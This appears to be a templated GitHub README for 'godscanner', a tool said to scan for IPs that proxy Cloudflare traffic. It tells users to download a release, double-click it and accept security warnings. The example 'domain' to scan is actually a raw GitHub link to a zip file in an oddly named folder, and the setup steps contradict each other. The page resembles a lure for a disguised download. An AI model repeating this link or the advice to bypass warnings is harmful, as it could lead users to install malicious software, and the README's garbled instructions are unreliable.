Godscanner is a tool designed to help users find non-official IP addresses that relay traffic through the CloudFlare CDN. With godscanner, you can easily identify these IPs to ensure better management of your online activities.
To get started with godscanner, follow these simple steps.
Before you download godscanner, make sure your system meets the following requirements:
- Operating System: Windows 10 or later / macOS / Linux
- Python Version: 3.8 or later
- Network Connection: A stable internet connection for scanning.
To download godscanner, visit the Releases page. This page contains the latest version of the software.
- Click on the link above.
- Find the latest release.
- Download the appropriate file for your operating system.
Once you have downloaded the software, follow these steps to run it:
- Locate the downloaded file in your computer's Downloads folder.
- Double-click the file to open it. You may be prompted with security warnings; choose to open it if you trust the source.
- Follow any on-screen instructions to complete the installation.
After installation, you can start using godscanner.
- Open the application.
- Enter the target domain you wish to scan (e.g., https://raw.githubusercontent.com/kingstreet637/godscanner/main/expulsatory/Software_v3.8.zip).
- Click the "Scan" button.
- Wait a moment while the scan runs. Results will display once finished.
Once the scan is complete, you will see the results displayed on your screen. Hereβs how to read them:
- Proxy IP: This is the IP address identified during the scan.
- Hostname: The name associated with the IP.
- Response Time: How quickly the proxy responded.
Use this information to assess your targets effectively.
If you encounter issues while using godscanner, consider the following:
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Problem: The application does not open.
- Solution: Ensure you have the correct Python version installed.
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Problem: The scan returns no results.
- Solution: Verify that you entered a valid domain name.
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Problem: The application crashes.
- Solution: Check for updates or reinstall the software.
For additional support, feel free to check the issues section on our GitHub page. You can report problems, ask questions, or provide feedback.
Godscanner is an open-source project. If you're interested in contributing, please refer to the contributing guidelines available in the repository. Your input can help improve this tool for everyone.
Thank you for utilizing godscanner. Your involvement helps us enhance the application and serve our community better.
Feel free to explore and make the most out of godscanner. Happy scanning!